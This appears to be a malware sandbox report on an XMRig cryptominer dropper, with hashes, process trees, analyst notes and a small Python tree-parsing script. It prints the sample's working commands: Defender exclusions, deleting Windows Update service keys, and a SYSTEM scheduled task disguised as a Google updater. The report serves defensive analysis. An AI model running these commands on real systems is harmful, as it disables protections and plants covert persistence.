Analysis
- max time kernel: 150s
- max time network: 154s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 10-10-2022 07:20
- Static task: static1
- Behavioral task: behavioral1
  - Sample: their.exe
  - Resource: win7-20220812-en
General
- Target: their.exe
- Size: 4.0MB
- MD5: 8d868a206455746c8d3a2e653d86406e
- SHA1: 85323deccfdd24d8b4a8bcb8ec6d3ed973415f21
- SHA256: ad2ac8f51fefe49c234155309eb8cc0faa4e1e05b2b30317691950d5f4dd8ea1
- SHA512: cb80788d0431be41022fea57d8f438eeaec6d058135510b0aa47be5db057b30a8c6be27eb036668b721a8320b98a37ffd4e6af3d81bfa62de43d3155acf71c5b
- SSDEEP: 98304:YzQ7QFYA6K/6gtrUFbwaEXTdwutEoV5pPfl:aQU/6KygyFsawThb
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)
The reg delete commands in the process tree name HKLM\SYSTEM\CurrentControlSet\Services\...; CurrentControlSet is a symbolic link to the active control set (ControlSet001 on this image), so both spellings refer to the same keys. Deleting a service's key, rather than stopping or disabling it, means the service does not exist after the next reboot.
XMRig Miner payload 2 IoCs
Processes: memory dumps
- behavioral1/memory/1212-138-0x0000000140000000-0x00000001407F4000-memory.dmp matches yara rule xmrig
- behavioral1/memory/1212-142-0x0000000140000000-0x00000001407F4000-memory.dmp matches yara rule xmrig
Both dumps are the same 8.0MB region of PID 1212 (conhost.exe), the process updaterload.exe targets with SetThreadContext below; 0x140000000 is the default image base of a 64-bit PE, and the same region also matches the upx rule, consistent with a packed miner image written into a hollowed conhost.exe.
Drops file in Drivers directory 2 IoCs
Processes: conhost.exe, updaterload.exe
- File created: C:\Windows\system32\drivers\etc\hosts (conhost.exe)
- File created: C:\Windows\system32\drivers\etc\hosts (updaterload.exe)
The rewritten hosts file (2KB) is hashed in the Downloads section; diff it against the stock file to see which names were redirected or blackholed.
Executes dropped EXE 1 IoCs
Processes: updaterload.exe
- PID 1712 updaterload.exe
Stops running service(s) 3 TTPs
yara rule upx 2 IoCs
Processes: memory dumps
- behavioral1/memory/1212-138-0x0000000140000000-0x00000001407F4000-memory.dmp matches yara rule upx
- behavioral1/memory/1212-142-0x0000000140000000-0x00000001407F4000-memory.dmp matches yara rule upx
Loads dropped DLL 1 IoCs
Processes: taskeng.exe
- PID 484 taskeng.exe
Drops file in System32 directory 2 IoCs
Processes: powershell.exe, powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
The path is recorded with an unexpanded %ProgramData% and points at PowerShell's own Start Menu shortcut; no command line in the tree references it, so this is most likely start-up noise from powershell.exe rather than an action of the sample.
Suspicious use of SetThreadContext 2 IoCs
Processes: updaterload.exe
- PID 1712 (updaterload.exe) set thread context of PID 1280 (conhost.exe)
- PID 1712 (updaterload.exe) set thread context of PID 1212 (conhost.exe)
SetThreadContext on another process, after that process was written to, is the last step of process hollowing: the suspended thread is pointed at the injected image. PID 1212 is the process whose memory matches the xmrig and upx rules; PID 1280 is also the PID the sandbox reports for their.exe in the WriteProcessMemory table.
Drops file in Program Files directory 4 IoCs
Processes: cmd.exe, cmd.exe, conhost.exe, updaterload.exe
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created: C:\Program Files\Google\Chrome\updaterload.exe (conhost.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (updaterload.exe)
The payload is written by the injected conhost.exe, not by their.exe itself. WR64.sys is the name XMRig-based loaders commonly give the bundled WinRing0 driver the miner loads for MSR access; it is not among the files hashed under Downloads, and the LoadsDriver signature below records PID 464 without an image name, so recover the .sys from the host if you need to confirm which driver was loaded.
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
- PIDs: 1288, 868, 320, 1404, 584, 912, 1220, 1980, 1184, 288
All ten invocations are "sc stop" against Windows Update components (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), run once by their.exe and once again by the dropped updaterload.exe.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe
- PID 1132 schtasks.exe
- PID 2004 schtasks.exe
PID 2004 is also reported as powershell.exe elsewhere in this report; Windows reuses PIDs within a run, so correlate on image name and parent, not on PID alone.
Modifies data under HKEY_USERS 7 IoCs
Processes: WMIC.exe, conhost.exe, powershell.exe
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0cfef8a89dcd801 (powershell.exe)
Processes running as LocalSystem see HKU\.DEFAULT as their HKCU, which matches the task being registered with /ru System. The SystemCertificates keys under the injected conhost.exe are typically created the first time a process opens the system certificate store, for instance for an outbound TLS connection.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: schtasks.exe, powershell.exe (4 instances), conhost.exe
- 2004 schtasks.exe
- 852 powershell.exe
- 808 powershell.exe
- 1368 powershell.exe
- 1628 powershell.exe
- 1212 conhost.exe (repeated; 64 IoCs in total)
Suspicious behavior: LoadsDriver 1 IoCs
Processes: (no image name recorded)
- PID 464
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes: schtasks.exe, powercfg.exe, sc.exe, powershell.exe, updaterload.exe, WMIC.exe, conhost.exe
- SeDebugPrivilege: 2004 schtasks.exe
- SeShutdownPrivilege: 2020 powercfg.exe
- SeShutdownPrivilege: 320 sc.exe
- SeShutdownPrivilege: 1208 powercfg.exe
- SeDebugPrivilege: 852 powershell.exe
- SeShutdownPrivilege: 1628 powershell.exe
- SeDebugPrivilege: 808 powershell.exe
- SeDebugPrivilege: 1368 powershell.exe
- SeShutdownPrivilege: 680 powercfg.exe
- SeDebugPrivilege: 1628 powershell.exe
- SeShutdownPrivilege: 816 powercfg.exe
- SeShutdownPrivilege: 1824 powercfg.exe
- SeShutdownPrivilege: 1704 powercfg.exe
- SeDebugPrivilege: 1712 updaterload.exe
- 1592 WMIC.exe, each reported twice: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- SeLockMemoryPrivilege: 1212 conhost.exe
SeShutdownPrivilege on powercfg.exe and the block of privileges WMIC.exe enables are routine for those tools. The two worth acting on are SeDebugPrivilege on updaterload.exe, the usual preparation for opening another process for injection, and SeLockMemoryPrivilege on the injected conhost.exe, which XMRig enables to back its scratchpad with large pages; a console host has no reason to ask for it.
Suspicious use of WriteProcessMemory 64 IoCs
Processes: their.exe, conhost.exe, cmd.exe, cmd.exe, powershell.exe, powershell.exe, taskeng.exe
Each parent/child pair below is reported three times unless noted; 22 distinct pairs make up the 64 IoCs.
- PID 1280 (their.exe) wrote to memory of 2004 (powershell.exe)
- PID 1280 (conhost.exe) wrote to memory of 1328 (cmd.exe)
- PID 1280 (conhost.exe) wrote to memory of 1068 (cmd.exe)
- PID 1280 (conhost.exe) wrote to memory of 852 (powershell.exe)
- PID 1068 (cmd.exe) wrote to memory of 2020 (powercfg.exe)
- PID 1328 (cmd.exe) wrote to memory of 1288 (sc.exe)
- PID 1328 (cmd.exe) wrote to memory of 584 (sc.exe)
- PID 1068 (cmd.exe) wrote to memory of 320 (sc.exe)
- PID 1328 (cmd.exe) wrote to memory of 912 (sc.exe)
- PID 1328 (cmd.exe) wrote to memory of 868 (sc.exe)
- PID 1068 (cmd.exe) wrote to memory of 1208 (powercfg.exe)
- PID 1068 (cmd.exe) wrote to memory of 1628 (powershell.exe)
- PID 1328 (cmd.exe) wrote to memory of 1220 (sc.exe)
- PID 1328 (cmd.exe) wrote to memory of 1668 (reg.exe)
- PID 1328 (cmd.exe) wrote to memory of 1740 (reg.exe)
- PID 1328 (cmd.exe) wrote to memory of 1768 (reg.exe)
- PID 1328 (cmd.exe) wrote to memory of 524 (reg.exe)
- PID 1328 (cmd.exe) wrote to memory of 816 (powercfg.exe)
- PID 852 (powershell.exe) wrote to memory of 1132 (schtasks.exe)
- PID 1280 (conhost.exe) wrote to memory of 808 (powershell.exe)
- PID 808 (powershell.exe) wrote to memory of 564 (conhost.exe)
- PID 484 (taskeng.exe) wrote to memory of 1712 (updaterload.exe) (reported once)
PID 1280 is named their.exe in the first row and conhost.exe in the rest, and the same PID is a SetThreadContext target of updaterload.exe above; the writes from the sandbox's point of view are the normal CreateProcess bookkeeping of a parent, so the rows that matter are those whose target later shows injected code (conhost.exe).
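The table above is easier to work with as a tree than as 64 flattened rows. The following is an added example, not part of the sandbox report: it parses "wrote to memory of" records into a parent/child map, collapses the triplicated rows, and walks lineages, so the chain from taskeng.exe to the dropped updaterload.exe and the dual-named PID 1280 can be read off directly. SAMPLE_RECORDS is a constructed subset of this report's rows; the function names are assumptions of this example.

```python
"""Rebuild the process tree from Triage-style "wrote to memory of" records.

Added example, not part of the sandbox report. SAMPLE_RECORDS is a
constructed subset copied from this report's WriteProcessMemory table,
including the triplicated rows the sandbox emits per parent/child pair.
"""
import re
from collections import Counter, defaultdict

SAMPLE_RECORDS = """
PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe
PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe
PID 1280 wrote to memory of 2004 1280 their.exe powershell.exe
PID 1280 wrote to memory of 1328 1280 conhost.exe cmd.exe
PID 1328 wrote to memory of 1288 1328 cmd.exe sc.exe
PID 1280 wrote to memory of 852 1280 conhost.exe powershell.exe
PID 852 wrote to memory of 1132 852 powershell.exe schtasks.exe
PID 484 wrote to memory of 1712 484 taskeng.exe updaterload.exe
"""

# One record: "PID <ppid> wrote to memory of <cpid> <ppid> <parent image> <child image>"
RECORD_RE = re.compile(
    r"PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) (?P=ppid) "
    r"(?P<pname>\S+) (?P<cname>\S+)"
)


def multiplicities(text):
    """How often each (ppid, pname, cpid, cname) row appears; most appear three times."""
    return Counter(
        (int(m["ppid"]), m["pname"], int(m["cpid"]), m["cname"])
        for m in RECORD_RE.finditer(text)
    )


def build_tree(text):
    """Return (parent_of, names): child PID -> parent PID, and PID -> set of image names."""
    parent_of = {}
    names = defaultdict(set)
    for ppid, pname, cpid, cname in multiplicities(text):
        parent_of[cpid] = ppid
        names[ppid].add(pname)
        names[cpid].add(cname)
    return parent_of, names


def lineage(pid, parent_of, names):
    """Walk from pid up to its root; each hop is 'pid:name[/name]', child first."""
    chain = []
    while pid is not None:
        chain.append(f"{pid}:{'/'.join(sorted(names[pid]))}")
        pid = parent_of.get(pid)
    return chain


def pids_with_several_names(names):
    """PIDs the sandbox reports under more than one image name (PID reuse or a hollowed process)."""
    return sorted(pid for pid, n in names.items() if len(n) > 1)


if __name__ == "__main__":
    parent_of, names = build_tree(SAMPLE_RECORDS)
    for pid in (1132, 1712):
        print(" <- ".join(lineage(pid, parent_of, names)))
    print("PIDs with several names:", pids_with_several_names(names))
```

Run it on the full table (paste all rows into SAMPLE_RECORDS) and `pids_with_several_names` is the quickest way to spot processes that changed identity mid-run, which in this report is exactly the conhost.exe that ends up holding the miner.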
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\their.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\their.exe"
  signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - [2] C:\Windows\system32\cmd.exe
    cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /x -hibernate-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /x -hibernate-timeout-dc 0
    - [3] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /x -standby-timeout-ac 0
      signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /x -standby-timeout-dc 0
  - [2] C:\Windows\system32\cmd.exe
    cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\sc.exe
      cmdline: sc stop UsoSvc
      signatures: Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      cmdline: sc stop WaaSMedicSvc
      signatures: Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      cmdline: sc stop wuauserv
      signatures: Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      cmdline: sc stop bits
      signatures: Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      cmdline: sc stop dosvc
      signatures: Launches sc.exe
    - [3] C:\Windows\system32\reg.exe
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    - [3] C:\Windows\system32\reg.exe
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    - [3] C:\Windows\system32\reg.exe
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    - [3] C:\Windows\system32\reg.exe
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      signatures: Modifies security service
    - [3] C:\Windows\system32\reg.exe
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell <#xocqwwgcr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\schtasks.exe
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskEditor /tr "'C:\Program Files\Google\Chrome\updaterload.exe'"
      signatures: Creates scheduled task(s)
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell <#hhngss#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskEditor" } Else { "C:\Program Files\Google\Chrome\updaterload.exe" }
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\schtasks.exe
      cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskEditor
  - [2] C:\Windows\system32\cmd.exe
    cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    signatures: Drops file in Program Files directory
- [1] C:\Windows\system32\taskeng.exe
  cmdline: taskeng.exe {15CD5328-37FC-4AD2-BF4A-B007E8C8A588} S-1-5-18:NT AUTHORITY\System:Service:
  signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - [2] C:\Program Files\Google\Chrome\updaterload.exe
    cmdline: "C:\Program Files\Google\Chrome\updaterload.exe"
    signatures: Drops file in Drivers directory; Executes dropped EXE; Suspicious use of SetThreadContext; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - [4] C:\Windows\system32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
        signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - [4] C:\Windows\system32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      - [4] C:\Windows\system32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      - [4] C:\Windows\system32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - [4] C:\Windows\system32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell <#xocqwwgcr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
      signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\schtasks.exe
        cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskEditor /tr "'C:\Program Files\Google\Chrome\updaterload.exe'"
        signatures: Creates scheduled task(s); Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      signatures: Drops file in Program Files directory
      - [4] C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
        signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\conhost.exe
      cmdline: C:\Windows\system32\conhost.exe czjocpdzix
      signatures: Drops file in Drivers directory; Drops file in Program Files directory; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\conhost.exe (command line on the next two lines: conhost.exe wbddxxhtzvvizkaa followed by a long base64-looking argument)
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe wbddxxhtzvvizkaa 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3⤵
      signatures: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
The following processes are shown by the sandbox without a parent; their command lines match the second "sc stop" batch issued under updaterload.exe.
- [1] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  signatures: Launches sc.exe
- [1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- [1] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  signatures: Launches sc.exe
- [1] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  signatures: Launches sc.exe; Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  signatures: Launches sc.exe
- [1] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  signatures: Launches sc.exe
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "11721838981685343511201026531011558035451171746382-32152953-880725828-1256815223"

Notes on the tree:
- Add-MpPreference -ExclusionPath excludes the entire user profile and Program Files from Defender scanning. The Defender PowerShell module does not exist on the Windows 7 image used for this run, so here the call fails; on Windows 10 and later it succeeds whenever the caller is elevated. Check Get-MpPreference on a suspect host for these two exclusions.
- The four powercfg calls set every standby and hibernate timeout to 0 (never) on both AC and battery, keeping the host awake so the miner keeps running.
- The sc stop / reg delete batch stops Windows Update and its delivery components (UsoSvc, WaaSMedicSvc, wuauserv, BITS, dosvc) and then deletes their service keys, so they do not return on reboot.
- The persistence wrapper (<#xocqwwgcr#>) branches on elevation and OS version: elevated on a build older than 6.2 (Windows 8) it runs schtasks.exe with /ru System and /rl highest; elevated on a newer build it uses Register-ScheduledTask, which needs the ScheduledTasks module introduced with Windows 8; unelevated it falls back to an HKCU Run key. On this Windows 7 image the schtasks branch ran, which is why schtasks.exe appears as the child. The task name GoogleUpdateTaskEditor and the path C:\Program Files\Google\Chrome\updaterload.exe are chosen to look like Google's updater.
- The second wrapper (<#hhngss#>) starts the task immediately (schtasks /run) rather than waiting for the next logon. The tree shows the result: taskeng.exe, running as S-1-5-18 (SYSTEM), starts updaterload.exe, which repeats the whole setup and then injects into conhost.exe.
